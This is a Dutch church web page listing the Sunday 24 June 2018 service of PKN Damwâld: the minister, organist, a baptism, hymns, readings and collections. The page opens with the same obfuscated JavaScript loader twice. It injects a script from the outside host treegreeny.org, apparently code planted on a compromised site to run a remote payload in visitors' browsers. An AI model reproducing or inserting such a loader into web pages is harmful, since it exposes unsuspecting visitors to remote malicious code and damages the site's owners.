;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 juni 2018 9:30 uur - PKN Damwâld
zondag 24 juni 2018
09:30 uur
Heilige Doop Isa Fleur - Koffie na de dienst

Kerkdienst zondag 24 juni 2018 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Mededeling:Heilige Doop Isa Fleur - Koffie na de dienst
Liturgie
We zingen: Gez.444: 1 en 3
Welkom
We zingen: Opw.733: 1,2 en 3
Stilgebed, Votum en groet
We zingen: ELB 278:1 en 2
geloofsbelijdenis .
We zingen: Gez. 334: 1 en 4
Formulier
Vragen beantwoorden
Kinderen mogen naar voren komen
bediening doop
Gedicht Bonnie
Gebed
We lezen: Jesaja 61
We zingen: Ps.90:1 en 8
Preek .
We zingen: Opw.642: 1 en 2
Gebed
Collecte
Slotlied : Gez.293:1,3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk